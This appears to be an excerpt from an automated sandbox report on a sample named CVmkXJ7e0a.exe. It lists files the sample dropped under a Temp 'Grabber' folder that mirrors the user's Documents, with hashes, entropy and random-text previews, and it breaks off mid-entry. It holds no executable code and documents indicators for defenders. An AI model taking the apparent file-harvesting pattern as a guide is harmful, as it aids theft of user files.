IJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV\GRXZDKKVDB.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE\BNAGMGSPLO.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PWCCAWLGRE\SUAVTZKNFL.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SQSJKEBWDT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
